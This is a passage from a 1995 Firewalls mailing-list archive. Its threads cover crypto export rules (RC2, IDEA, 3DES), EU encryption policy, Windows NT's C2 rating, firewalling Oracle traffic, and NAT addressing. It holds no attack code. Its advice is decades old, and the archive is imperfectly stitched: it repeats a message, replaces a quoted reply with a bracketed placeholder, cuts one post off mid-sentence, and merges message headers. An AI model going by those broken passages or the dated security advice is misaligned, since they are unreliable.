national legislation and international agreement. Whatever you decide to do in
the short term, it would be wise to watch forthcoming announcements.

Ian J-B

----------
From: firewalls-owner
To: raberry2
Cc: firewalls
Subject: Re: International Encryption Protocols (RC2) or (IDEA)
Date: Tuesday, October 10, 1995 4:26PM

[Adam Shostack's reply to Ron Berry, quoted here in full, appears earlier in this archive.]
From firewalls-owner Wed Oct 11 02:30:07 1995
From: Mirto Busico
To: "'firewalls@greatcircle.com'"
Date: Wed, 11 Oct 1995 10:24:19 +-100
Message-Id: <01BA97C3.BA8671E0@pc-mirto-it>
Subject: R: International Encryption Protocols (RC2) or (IDEA)

I think there is already an EU Recommendation issued.
Recommendation already emitted. The Recommendation is: "Concerning Problems of Criminal Procedure Law Connected with Information Technology", No. R (95) 13. You can find it at: http://www.eff.org/pub/Global/Multinational/Privacy

The information comes from this message:

____________ begin received message_______________________________

As you may already know, the Council of Europe has issued a "recommendation" (Recommendation No. R (95) 13) entitled "Concerning Problems of Criminal Procedure Law Connected with Information Technology". The full text can be found at http://www.eff.org/pub/Global/Multinational/Privacy/

The latest EFF bulletin (EFFector 08.16) contains a brief analysis of the recommendation. A lively discussion is under way on the Usenet newsgroup "talk.politics.crypto". I can send the texts by e-mail (11 kB and 66 kB respectively) to anyone who has no WWW access (is that possible?).

Massimo Campostrini,
Istituto Nazionale di Fisica Nucleare, Sezione di Pisa
e-mail: campo@sunthpi3.difi.unipi.it
WWW home page: http://www.difi.unipi.it/~campo/

_______________end received message______________________________

----------
From: Johnson-Bryden, Ian [SMTP:IJB@saicuk.co.uk]
Sent: Wednesday 11 October 1995 10.17
To: 'firewalls@greatcircle.com'
Subject: Re: International Encryption Protocols (RC2) or (IDEA)

There is a lot of misinformation circulating about encryption. The OECD is due to make an announcement of recommendations around May next year which will apply to some 24 nations. The European Commission has encryption high on its agenda. DGXIII is reviewing the matter in respect of encryption across the member states and across international boundaries. An announcement could be made this year.
Unlike OECD recommendations, work by the Commission will become a directive within the EU and that will supersede national legislation in the member states, or, more accurately, require member states to enact national legislation in support of the directive.

It remains to be seen how this will interact with US Federal regulations and policies, but as the EU (and the countries preparing to make application to join the EU) represents the largest world economic group and market, it will be very difficult for other countries to ignore the EU policy. There is also a suggestion that encryption may be covered under GATT in that some national attitudes could be claimed to be in restraint of trade.

At present any vendor can make claims and come up with creative ways around existing legislation, but the question is how this will later sit with national legislation and international agreement. Whatever you decide to do in the short term, it would be wise to watch forthcoming announcements.

Ian J-B

----------
From: firewalls-owner
To: raberry2
Cc: firewalls
Subject: Re: International Encryption Protocols (RC2) or (IDEA)
Date: Tuesday, October 10, 1995 4:26PM

Ron Berry wrote:

| international basis. One vendor supports RC2 for the standard
| international encryption algorithm. I know little about RC2 and was
| hoping someone could shed some light on this for me. What is the
| definition of the acronym; What key length is it based on; Who or what
| organization is responsible for it (who designed it); is it widely
| used???

RC2 is a trade secret of RSADSI. RC probably stands for 'Ron's Code,' after the author, Ron Rivest. It is not widely used, as it is slower than RC4, and until recently, there was no way of knowing which of the two algorithms is stronger. Thus, people using RSA technology tended to use RC4 instead. If an encryption algorithm can be exported from the United States, it is, by law, quite weak.
I would urge that you look at buying your encryption technology outside of the US for worldwide deployment. IDEA is a relatively new cryptosystem, but it has been subjected to a fair amount of scrutiny, and it seems to resist most attacks well. RC2, being private, has not been subjected to anything like the same kind of scrutiny. I would suggest using IDEA or 3DES as your main bulk cryptosystem.

For an excellent introduction to cryptography, read Bruce Schneier's Applied Cryptography. Any good technical library should have it. (I'd put off buying a copy; the much expanded second edition should be out soon.)

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

______________________________________________________________________
Opinions expressed are mine and not those of my employer
______________________________________________________________________
Mirto Busico            | e-mail mirto@roma.europe.dg.com
Data General Italia     | phone +39-6-50511398
______________________________________________________________________

From firewalls-owner Wed Oct 11 02:43:17 1995
From: gblolmxb@ibmmail.com
Message-Id: <199510110934.CAA22754@miles.greatcircle.com>
Date: Wed, 11 Oct 1995 05:35:37 EDT
To: avalon@coombs.anu.edu.au, firewalls@greatcircle.com

Darren Reed wrote about his local telco starting up a 'private' network, in conjunction with AT&T, NTT, Unisource and Deutsche Telekom.
This sort of network has been around for some time; IBM for example have a global network, and it can be used for IP, IPX etc. I have raised the need for a firewall to filter IP traffic in the past, but have been told that there is no need as the network is private & secure. I don't believe this; does anyone else have any comments? (preferably from people who know about IBM's MPN).

Mark.

From firewalls-owner Wed Oct 11 03:00:42 1995
Date: Wed, 11 Oct 1995 09:55:37 +0100 (MET)
From: Kim Wohlert
Subject: Re: Windows NT
To: Firewalls@GreatCircle.COM
Cc: PADGETT@hobbes.orl.mmc.com
Message-id: <01HWB61KZ9MQ0004P9@MAINZ.DK>

"A. Padgett Peterson, P.E. Information Security"

>Date: Tue, 10 Oct 1995 13:47:13 -0400 (EDT)
>Subject: Windows NT
>
>At the NIST/NSA/NCSC conference it was announced that Windows NT
>has met C2 requirements and may display the logo on its
>packages. The "Administrator's Security Guide" lists configurations for
>Compaq ProLiant 2000 & 4000 & DECpc AXP/150.
>
>*None* of the configurations include a network interface card (am assured
>that that will be included RSN (4-6 months est.)).

I must correct you here. Both of the above Compaqs come with a network interface card built in, so no configuration is possible without a card. Thus I would assume the C2 certification covers that. I *think* the AXP also has a NIC built in, but haven't been able to confirm this on short notice.
Regards
-Kim

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Kim Wohlert            |Internet: Kim.Wohlert@mainz.dk
erik mainz a/s         |X.400: c=DK a=DK400 p=Minerva
Dortheavej 7           |       o=mainz s=Wohlert g=Kim
DK-2400 Copenhagen     |Phone: +45 38 34 77 88
Denmark                |Fax:   +45 31 19 16 25
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
I guess sometimes there just aren't enough stones to throw. -Forest Gump

From firewalls-owner Wed Oct 11 03:43:15 1995
Message-Id: <199510111027.LAA25359@server.sentinet.demon.co.uk>
To: firewalls@greatcircle.com
Subject: Telco networks
Date: Wed, 11 Oct 1995 11:27:17 +0100
From: Lyndon David

Hi,

At a recent meeting with a client I offered that they should not consider the ISDN, frame relay etc. networks private and that to be sure of security they should crypt the links. Other than hearsay I am unable to quantify the problem or give any measure of how difficult it is to listen in on / modify the link. Does anyone have any more information as to what the vulnerabilities are and how easy/hard they would be?
While we are at it, how long is a piece of string :)

Thanks
Lyndon

From firewalls-owner Wed Oct 11 04:00:02 1995
Message-Id: <9510111002.AA00441@picmqsn.is.mazda.co.jp>
Date: Wed, 11 Oct 1995 19:02:01 +0900
From: Yoshihisa SUNADA
To: David Schnardthorst
Cc: firewalls@GreatCircle.COM
Subject: Re: Oracle <-> Firewall
In-Reply-To: <199510101231.FAA14205@miles.greatcircle.com>

gary flynn wrote:

>> From: David Schnardthorst
>> Subject: Oracle <-> Firewall
>>
>> Does anybody know of a way to get Oracle Information through a Firewall?
>>
>> We are setting up a firewall, with our Web Servers on the outside, however
>> we need to pass some information from an Oracle Database through the firewall
>> to the outside Web Servers.
>>
>> Has anybody done this, and if so, could you please give me some ideas of
>> how to accomplish this.
>>
>
>I asked this about a month ago and haven't summarized so I'll do so now.
>
>There is no proxy version of SQLnet or its overlying applications.
>Everyone is using a pass-thru filter like TIS's FWTK plug-gw or a
>filtering router to pass SQLnet.
>Five or six people gave me the same
>answer.
>
>There are probably two ways to do a SQLnet proxy. The first would
>be to build a lot of intelligence into the proxy itself that could
>understand what actions on what databases by what user was being
>requested. The second would be to provide an API to SQLnet
>based applications that allowed for things like querying for
>authentication information. In either case, Oracle would have to
>do it and the second case would involve modification of lots of
>applications. Just idle speculation on my part :-)
>

I think that another possible method at present is to install another Oracle DBMS and its distributed option on a "proxy machine". On that other server you create views that link to the internal Oracle DB server. But you have to purchase one more Oracle DB Server and its distributed option.

_/ Yoshihisa Sunada                                           _/
_/ 735  3-1 Shinchi, Fuchu-cho, Aki-gun, Hiroshima            _/
_/ Mazda Motor Corporation, Information Systems Division      _/
_/ Systems Technology Gr.                                     _/
_/ Phone: 082-287-4865 (direct)                               _/
_/ Fax: 082-287-5233                                          _/
_/ E-mail: sunada.y@is.mazda.co.jp                            _/

From firewalls-owner Wed Oct 11 04:30:02 1995
Date: Wed, 11 Oct 1995 13:18:56 +0200 (EET)
From: Sergey Zhuk
To: Paul Ferguson
cc: Colin Campbell, Firewalls@GreatCircle.COM
Subject: Re: IP seq. number attacks
In-Reply-To: <199510110031.RAA19988@lint.cisco.com>

hi

On Tue, 10 Oct 1995, Paul Ferguson wrote:

> In fact, I can understand why most providers would prefer to do static
> routing when only a single access exists, simply because it is much
> simpler to avoid injecting errant routes into an external routing
> protocol. :-)

yep ;)

> In any event, the most compelling reason to do any type of dynamic
> routing between a provider and client access is the presence of
> dual or multihomed connectivity.

and this is my case ;) look at my next answer in Firewalls...

--
+-------------------------------------+-------------------------------------+
| Sergey Zhuk                         | serge@freenet.kiev.ua               |
| UN Internet Project                 | +380-44-228-6393                    |
| System and Network Administrator    | www.freenet.kiev.ua, www.un.kiev.ua |
+-------------------------------------+-------------------------------------+

From firewalls-owner Wed Oct 11 04:43:12 1995
Date: Wed, 11 Oct 1995 13:16:28 +0200 (EET)
From: Sergey Zhuk
To: Firewalls@GreatCircle.COM
Subject: Re: Firewalls-Digest V4 #583
In-Reply-To: <199510102231.PAA06184@miles.greatcircle.com>

hi

> From: sgcccdc@citec.qld.gov.au (Colin Campbell)
> Date: Wed, 11 Oct 95 8:07:39 EST
> Subject: Re: IP seq. number attacks
>
> Hi,
>
> With the setup you have, there is no real reason that I can see to exchange
> routing information with your provider. You can both live with static routes.

No, indeed I have a more complex structure; that was just a fragment, and I have at least 3 alternative paths to the outside world. I've solved the problem with ICMP redirects, but it's still one with addresses from my subnet on the external router. Now I'm restricting packets from that address to only one destination and only 2 ports of udp...

--
+-------------------------------------+-------------------------------------+
| Sergey Zhuk                         | serge@freenet.kiev.ua               |
| UN Internet Project                 | +380-44-228-6393                    |
| System and Network Administrator    | www.freenet.kiev.ua, www.un.kiev.ua |
+-------------------------------------+-------------------------------------+

From firewalls-owner Wed Oct 11 05:30:17 1995
From: Torsten Sturm (CIP 89)
Message-Id: <199510111210.NAA11297@faui01.informatik.uni-erlangen.de>
Subject: Microsoft STT (Secure Transaction Technology) ?
To: Firewalls@GreatCircle.COM
Date: Wed, 11 Oct 1995 13:10:39 +0100 (MET)

Microsoft STT (Secure Transaction Technology)
Private Communication Technology (PCT)

What is your opinion about the following:

http://www.microsoft.com/windows/pr/spt2795m.htm

--
Time is a drug. Too much of it kills you (Terry Pratchett: Small Gods)
__________________________________________________________________________
|                                                                        |
| Torsten Sturm: ComputerScience Student University of Erlangen-Nuremburg|
| FTP-Administrator for PC / Windows subdirs of ftp.uni-erlangen.de      |
|                                                                        |
| EMail: tnsturm@cip.informatik.uni-erlangen.de                          |
| WWW: http://wwwcip.informatik.uni-erlangen.de/user/tnsturm/index.html  |
|________________________________________________________________________|

From firewalls-owner Wed Oct 11 05:43:41 1995
Message-Id: <199510111241.FAA27271@miles.greatcircle.com>
Date: Wed, 11 Oct 1995 08:42:59 EDT
From: toon@cem-bb.e-mail.com
To: firewalls@greatcircle.com

Mark (gblolmxb@ibmmail.com) is wondering about the IBM Global Network. As far as I know they have an SNA (SNI) part that is separated from a more 'open' part (IP, IPX) by some internal security gateways.
We ourselves do make use of the SNA part and I feel comfortable with it. I would not feel so comfortable with the 'open' part, because IBM uses it as their way to be an Internet provider, so it seems not logical that some security is placed between the Internet and an IBM customer. So, yes it is private, no it is not secure.

If you are connected to the SNA part without any IP connection, you still have some Internet functionalities available. There is the mail possibility that I'm using to send this message. It is not very user-friendly but it connects our mainframe users to the world. There is also an application called TCPgate where you log on to an IBM mainframe that acts as a gateway and lets you do Telnet, FTP or Gopher. Although this works and I think it is very secure, I don't like it (to telnet to a unix box with a 3270 screen makes me sick).

Toon Mordijck

From firewalls-owner Wed Oct 11 06:31:25 1995
From: Torsten Sturm (CIP 89)
Message-Id: <199510111308.OAA12730@faui01.informatik.uni-erlangen.de>
Subject: Re: Windows NT C2: Details here
To: Firewalls@GreatCircle.COM
Date: Wed, 11 Oct 1995 14:08:01 +0100 (MET)
In-Reply-To: <01HWB61KZ9MQ0004P9@MAINZ.DK> from "Kim Wohlert" at Oct 11, 95 09:55:37 am
To supply the C2 discussion with basic info:

DOCUMENT:Q93362   25-SEP-1995  [winnt]
TITLE   :C2 Evaluation and Certification for Windows NT
PRODUCT :Microsoft Windows NT
PROD/VER:3.10 3.50
OPER/SYS:WINDOWS
KEYWORDS:kbother
--------------------------------------------------------------------------
The information in this article applies to:

 - Microsoft Windows NT operating system version 3.1
 - Microsoft Windows NT Advanced Server version 3.1
 - Microsoft Windows NT Workstation version 3.5
 - Microsoft Windows NT Server version 3.5
--------------------------------------------------------------------------

SUMMARY
=======

C2 refers to a set of security policies that define how a secure system operates. The C2 evaluation process is separate from the C2 certification process. As of August, 1995, the National Security Agency (NSA) granted the C2 security rating for Windows NT Server and Workstation version 3.5. As a result these operating systems are on the Evaluated Products List (EPL).

NOTE: This does not mean that Windows NT is C2 certified (no operating system is ever C2 certified). Certification applies to a particular installation, including hardware, software, and the environment that the system is in. It is up to an individual site to become C2 certified.

MORE INFORMATION
================

The requirements for A-, B-, C-, and D-level secure products are outlined in the Trusted Computer System Evaluation Criteria (TCSEC) published by the National Computer Security Center (NCSC). This publication is referred to as the "Orange Book," and is part of NSA's security "rainbow series." Security level requirements are open to interpretations that change over time.
When undergoing evaluation, each vendor negotiates with the NSA about whether or not the details of its particular system implementation conform with the abstract security policy concepts in the NSA's books. The vendor must provide evidence that the requirements are being met.

Microsoft has opted not to include certain components of NT in the evaluation process, not because they would not pass the evaluation, but to save time by reducing the load on the NSA. Additionally, the MS-DOS/Windows on Windows (WOW) system may be treated as a Win32 application and would therefore not need to be evaluated as part of the Trusted Computer Base (TCB). Networking on NT may not have to go through the "Red Book," or "Trusted Network Interpretation." It may be enough to consider networking to be another subsystem, and therefore only the Orange Book would apply. New or modified components and other hardware platforms can go through a "RAMP" process to be included in the evaluation at a later time.

C2 Overview
-----------

The security policy in C2 is known as Discretionary Access Control (DAC). In the Windows NT implementation, the basic idea is that users of the system:

 - Own objects
 - Have control over the protection of the objects they own
 - Are accountable for all their access-related actions

C2 classification does not define a substantive security system in the sense of classified or unclassified data. (B-level security assumes the existence of an independent security classification system and enforces that system, but does not specify the substance of the classification system.) For example, in Windows NT, every object (file, Clipboard, window, and so on) has an owner; any owner can give or not give other users access to its objects. The system tracks (audits) your actions for the administrators (that is, the system administrator can track the objects you accessed, both successes and failures).
The key distinction between C-level and B-level security is in the notion of access control. In a C2 (DAC) system, owners have absolute discretion about whether or not others have access to their objects. In a B-level, or Mandatory Access Control (MAC) system, objects have a security level defined independently from the owner's discretion. For example, if you receive a copy of an object marked "secret," you can't give permission to other users to see this object unless they have "secret" clearance. This is defined by the system independent of your discretion. MAC involves the concept of "data labeling," which is the creation and maintenance by the system of security "labels" on data objects, unalterable by users (except in certain cases under system control and auditing).

An administrator can get access to anyone's objects, although it may require some programming to do so (that is, the user interface won't expose this power).

And another one:

DOCUMENT:Q137018  20-SEP-1995  [winnt]
TITLE   :Availability of C2 Security Compliant Windows NT
PRODUCT :Microsoft Windows NT
PROD/VER:3.50
OPER/SYS:WINDOWS
KEYWORDS:kbother
-------------------------------------------------------------------------
The information in this article applies to:

 - Microsoft Windows NT Workstation versions 3.5
 - Microsoft Windows NT Server versions 3.5
-------------------------------------------------------------------------

SUMMARY
=======

As of August, 1995, Windows NT Workstation and Windows NT Server version 3.5 with Service Pack 3 for Windows NT 3.5 installed achieved the C2 security rating from the U.S. National Security Agency (NSA). Windows NT Workstation and Windows NT Server are now the first mainstream, GUI operating systems to successfully complete this security evaluation.
MORE INFORMATION
================

As of September, 1995, customers who require C2 secure versions of Windows NT Workstation or Server version 3.5 can begin placing orders directly with Microsoft Inside Sales at (800) 426-9400.

Successful completion of the C2 security evaluation means that Windows NT Workstation and Server version 3.5 have now been added to the Evaluated Products List (EPL) published by the National Security Agency. Even though the C2 security class springs from the needs of US government installations, any organization concerned about security of business-sensitive data may have need of these security features.

For additional information on the C2 Evaluation and Certification process, please see the following article in the Microsoft Knowledge Base:

   ARTICLE-ID: Q93362
   TITLE     : C2 Evaluation and Certification for Windows NT

The National Security Agency requires that customers purchase the following components as the first step toward completion of a secure installation:

 1. The Windows NT Workstation or Windows NT Server software.
 2. Service Pack 3 for Windows NT version 3.5.
 3. The Security Administrator's Guide (aka Trusted Facilities Manual)

HTH
Torsten

--
Time is a drug.
Too much of it kills you (Terry Pratchett: Small Gods)
__________________________________________________________________________
|                                                                        |
| Torsten Sturm: ComputerScience Student University of Erlangen-Nuremburg|
| FTP-Administrator for PC / Windows subdirs of ftp.uni-erlangen.de      |
|                                                                        |
| EMail: tnsturm@cip.informatik.uni-erlangen.de                          |
| WWW: http://wwwcip.informatik.uni-erlangen.de/user/tnsturm/index.html  |
|________________________________________________________________________|

From firewalls-owner Wed Oct 11 06:43:19 1995
From: Chris Tyler
To: Firewalls@GreatCircle.COM
Date: Wed, 11 Oct 1995 09:38 EDT
Subject: HTTP Proxy for Inbound
Message-ID: <307bc8d20.1b10@devel.dejong.com>

I've never heard of proxying *inbound* http connections. The application is this: data from an http form needs to be passed to a midrange (AS/400 at a partner company). This could be done by having a CGI app receive the submitted form and talk to the AS/400 about it, or by passing the form directly to an httpd on the AS/400. Obviously, there is more control using the CGI app method, but what possibilities exist for passing the submission to the midrange?

Chris Tyler                                Chris@DeJong.Com   CTyler@Oxford.Net
Systems Development Manager, Wm. De Jong Enterprises Inc.
+1-519-424-9007 / fax +1-519-424-2399

From firewalls-owner Wed Oct 11 07:00:13 1995
Date: Wed, 11 Oct 1995 08:47:10 -0400
From: Ted Doty
Message-Id: <199510111247.IAA08689@kgbvax.network.com>
To: adam@bwh.harvard.edu, raberry2@ix.netcom.com (Ron Berry)
Subject: Re: International Encryption Protocols (RC2) or (IDEA)
In-Reply-To: Mail from 'Adam Shostack ' dated: Tue, 10 Oct 1995 16:26:23 -0400 (EDT)
Cc: firewalls@greatcircle.com

Adam Shostack writes:

> If an encryption algorithm can be exported from the United
> States, it is, by law, quite weak. I would urge that you look at
> buying your encryption technology outside of the US for worldwide
> deployment. IDEA is a relatively new cryptosystem, but it has been
> subjected to a fair amount of scrutiny, and it seems to resist most
> attacks well.

Since most governments consider cryptography to be a sensitive technology, most of them regulate it in one form or another. Certainly the signatory countries to the CoCom treaty all enforce similar export controls to those enforced by the USA. Therefore, do not go looking to purchase cryptography in the UK for use outside the UK. There appear to be a number of Swiss vendors for products containing IDEA, however, and I don't think that Switzerland signed the CoCom treaty.

Note: the treaty has expired, but the signatory countries seem to still be willing to follow it. Nobody really wants to see strong crypto widely deployed.

As always, all I know is what I read in the Washington Post.
;-)

-- 
- Ted
--------------------------------------------------------------------------
Ted Doty, Network Systems Corporation   | phone: +1 301 596-2270
8965 Guilford Road, Suite 250           | fax: +1 410 381-3320
Columbia, MD, 21046 USA                 | voice mail: (800) 233-1485
--------------------------------------------------------------------------
The opinion expressed in this message is fictitious. Any resemblance to real opinions, living or dead, is purely coincidental.

From firewalls-owner Wed Oct 11 07:43:30 1995
Message-Id: <199510111438.IAA27529@ncar.ucar.EDU>
Subject: Re: WE THE PEOPLE "....want the facts to make informed intel
To: mah@ic.co.at (Michael Haberler)
Date: Wed, 11 Oct 95 8:38:11 MDT
Cc: Brent@GreatCircle.COM, firewalls@GreatCircle.COM, mcb@GreatCircle.COM
In-Reply-To: ; from "Michael Haberler" at Oct 11, 95 4:39 am
From: woods@ncar.ucar.edu (Greg Woods)

> What about mailing list/news software which only would accept PGP-signed
> messages where the keys must have a certificate path length of at least 2 in
> the mailinglist web of trust (i.e. a contributor must be endorsed by at
> least two other)?

[...]

> I think it could reduce the
> random bozo factor by orders of magnitude.

Probably so, but it also increases the hassle factor for the legitimate members of the list. The typical tradeoff between security and user convenience; the more secure something is, the more hassle it is for the legitimate users.
I personally think this is way too much to require for your average mailing list just to eliminate spams. It will also eliminate a lot of potential contributors. However, this kind of thing probably has its uses for some specific cases, particularly where restricting who can contribute is considered a feature rather than a bug. --Greg From firewalls-owner Wed Oct 11 09:51:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA02818 for firewalls-outgoing; Wed, 11 Oct 1995 09:39:04 -0700 Received: from Fe3.rust.net (Fe3.rust.net [204.157.12.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA02811 for ; Wed, 11 Oct 1995 09:39:00 -0700 Received: from dtw-17.rust.net by Fe3.rust.net via SMTP (940816.SGI.8.6.9/940406.SGI.AUTO) for id MAA26046; Wed, 11 Oct 1995 12:41:25 -0700 Date: Wed, 11 Oct 1995 12:41:25 -0700 Message-Id: <199510111941.MAA26046@Fe3.rust.net> X-Sender: janken@rust.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: janken@rust.net (Kenneth J. Stephens) Subject: Firewall Marketing Survey (Sort of) V2 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have received several requests for more information from the Computer Security Institute (CSI)INTERNET Security survey. CSI will grant a copyright waiver for this document. I will post it on my WWW Page as soon as the paperwork is signed. I will post the WWW Page address here when it is ready. My ISP is going to kill me for this little trick. To reach CSI by email use this address: prapalus@mfi.com Thanks for the bandwidth. Ken PS: I do not represent CSI in any way, shape or form. This Information is presented without any validation of its accuracy. Bring your own grain of salt. 
[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] [] [] [] Ken Stephens Senior Capacity Planner/Data Security Officer [] [] email: Ken_Stephens@miconsulting.com Voice (313) 876-5081 [] [] Michigan Employment Security Commission (MESC) Fax (313) 876-6827 [] [] 7th Fl. I.S. [] [] 7310 Woodward Ave [] [] Detroit, MI 48202 [] [] [] [] Millennium Consulting Your Security Policy is only [] [] 28234 Diesing Dr. as strong as your organization's [] [] Madison Heights, MI 48071 commitment to it. [] [] [] [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] From firewalls-owner Wed Oct 11 10:45:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04143 for firewalls-outgoing; Wed, 11 Oct 1995 10:37:43 -0700 Received: from services ([168.166.0.67]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA04134 for ; Wed, 11 Oct 1995 10:37:37 -0700 Received: from services by services (SMI-8.6/SMI-SVR4) id MAA26105; Wed, 11 Oct 1995 12:36:00 -0500 Date: Wed, 11 Oct 1995 12:35:58 -0500 (CDT) From: "Frank K. Senter" X-Sender: fsenter@services To: Andrew Foss cc: "Jon 'tex' Boone" , lasseh@microfront.se, Firewalls@GreatCircle.COM Subject: Re: Address Translators In-Reply-To: <199510101921.MAA08517@translation.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 10 Oct 1995, Andrew Foss wrote: [Whack] > Most people who choose to continue to use other peoples addresses, merely > add static routes to the publicly accessible systems they may need to get to > in the overlapped address space. You also need to be sure those numbers > don't occur internally. > For example 20.0.0.0 belongs to CSC, they have a web site at 20.1.10.127. > Don't use 20.1.10.127 and provide a static route to that network if you > really need to contact it! 
> > In fact, many of the Class A owners prefer to dedicate a Class C to their > public machines anyway! > Nonetheless, if you have the option 10.0.0.0 is a better choice! Then what's a NAT for? I can throw static routes at any application gateway in order to "hide" my internal structure. What does the one-to-one address mapping provide? I think I read you as saying we should re-number our internal hosts to get away from (stolen) addresses. I view the static route solution as an ongoing administrative burden--or more importantly, that solution makes for poor IS-customer relations! We have to wait for our internal customers to discover our problem, then it's a race to see how quickly we can fix that particular instance. I'm not blasting you for making the above statement; thank you for clarifying exactly how your product works. Others have responded to my previous post with programming oriented solutions for determining "port of origin" and doing address translation accordingly. I'm sure, however, we will buy a commercial firewall. I'm not opposed to renumbering our hosts--just need good justification for the poor souls who will have to actually do the work. Frank Senter Senior Information Specialist Missouri Highway and Transportation Department P.O. 
Box 270 Jefferson City MO 65102 From firewalls-owner Wed Oct 11 11:34:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA04976 for firewalls-outgoing; Wed, 11 Oct 1995 11:22:16 -0700 Received: from bwh.harvard.edu (bwh.harvard.edu [134.174.81.34]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA04969 for ; Wed, 11 Oct 1995 11:22:12 -0700 Received: from asimov.bwh.harvard.edu (asimov.bwh.harvard.edu [134.174.81.55]) by bwh.harvard.edu (8.6.9/8.6.9) with ESMTP id OAA13177; Wed, 11 Oct 1995 14:20:13 -0400 From: Adam Shostack X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School Received: by asimov.bwh.harvard.edu (8.6.9) id OAA02744; Wed, 11 Oct 1995 14:20:37 -0400 Message-Id: <199510111820.OAA02744@asimov.bwh.harvard.edu> Subject: Re: International Encryption Protocols (RC2) or (IDEA) To: IJB@saicuk.co.uk (Johnson-Bryden Ian) Date: Wed, 11 Oct 1995 14:20:37 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <307B8386@smtpgty.saicuk.co.uk> from "Johnson-Bryden, Ian" at Oct 11, 95 09:17:00 am X-PGP: 0xE794DA91 FD3C3450FEB4A0B8 18F2E72CA82D29B8 X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 2508 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ian J-B wrote: | There is a lot of misinformation circulating about encryption. | | The OECD is due to make an announcement of recommendations around May next | year which will apply to some 24 nations. The European Commission has | encryption high on its agenda. DGXIII is reviewing the matter in respect of | encryption across the member states and across international boundaries. An | announcement could be made this year. 
Unlike OECD recommendations, work by | the Commission will become a directive within the EU and that will supersede | national legislation in the member states, or, more accurately, require | member states to enact national legislation in support of the directive. While Ian is substantially correct about the actions of governments, there are two points that he does not address. The first is that governments are subject to lobbying, the second is that most companies probably do not plan to wait six months to hear Washington or Brussels dictate their information security plans; they have real needs today that they should be planning to meet. Governments are subject to lobbying. Most of the governments that make the laws that cover most of the internet are, to one extent or another, answerable to the people, and do try to seek professional advice before making decisions. As most of us are aware, building strong information infrastructure requires strong cryptography; it's like using concrete for highways. Governments will need to make allowances for this for the Information Superhighway to be built. (Just today, another article on Internet insecurities was on the front page of the New York Times. This is no longer a small issue.) You have needs now; odds are good that those needs do not include Clipper. From the point of view of building a secure network, or offering secure services, Clipper and its relatives are a single point of failure outside of your control. The government employees who own the database don't answer to you. They are corruptible, and for a small price. Aldrich Ames cost three million dollars. Could you buy the Clipper database for less? How much could you steal if all data moving in the There is a large amount of fear, uncertainty, and doubt about cryptography's future. My advice is to build systems based on today's laws, and not on what the future may hold, if no one speaks up to oppose it. 
Clipper has died an ignoble death in the US, it is fair to assume its relatives will do the same in Europe. From firewalls-owner Wed Oct 11 11:43:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA05189 for firewalls-outgoing; Wed, 11 Oct 1995 11:31:22 -0700 Received: from motgate.mot.com (motgate.mot.com [129.188.136.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA05182 for ; Wed, 11 Oct 1995 11:31:17 -0700 Received: from pobox.mot.com (pobox.mot.com [129.188.137.100]) by motgate.mot.com (8.6.11/8.6.10/MOT-3.8) with ESMTP id NAA02443 for ; Wed, 11 Oct 1995 13:29:17 -0500 Received: from segfs001.rollingmdws.pamd.cig.mot.com (segfs001.rollingmdws.pamd.cig.mot.com [160.4.63.51]) by pobox.mot.com (8.6.11/8.6.10/MOT-3.8) with SMTP id NAA28594 for ; Wed, 11 Oct 1995 13:29:17 -0500 Received: from segws002.rollingmdws.pamd.cig.mot.com by segfs001.rollingmdws.pamd.cig.mot.com with smtp (Smail3.1.28.1 #10) id m0t35u0-0011VsC; Wed, 11 Oct 95 13:29 CDT Received: by segws002.rollingmdws.pamd.cig.mot.com (Smail3.1.28.1 #10) id m0t35qn-000VWxC; Wed, 11 Oct 95 13:25 CDT From: rthomas@pamd.cig.mot.com (Robert Owen Thomas) Message-Id: <9510111325.ZM16011@pamd.cig.mot.com> Date: Wed, 11 Oct 1995 13:25:57 -0500 X-Face: '+o0q01K;YU[Po[u16e?snj8;Ph$olcxk+[`d9&@_u}|*>qi52AcH"6z36pohM2<-EvKgoH[/FTF`GG)Csl`+9(6V/3W/BC9Pu3l0\2y$wGP@bj!Yn~f=_#.x.dYzEWFDe_MLBUIK\n[nkM_sq}/OjBILuOP$:F1#;YjjN3?PG8CJTwD"p/zT~^V_MqO\e; Tue, 10 Oct 1995 07:01:23 -0700 From: bt@vnet.IBM.COM Message-Id: <199510101401.HAA16338@miles.greatcircle.com> Received: from ATLVMIC1.VNET.IBM.COM by vnet.IBM.COM (IBM VM SMTP V2R3) with BSMTP id 0126; Tue, 10 Oct 95 09:59:19 EDT Date: Tue, 10 Oct 95 09:59:18 EDT To: firewalls@greatcircle.com Subject: 'IBM NAT box' Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From: Brian T. 
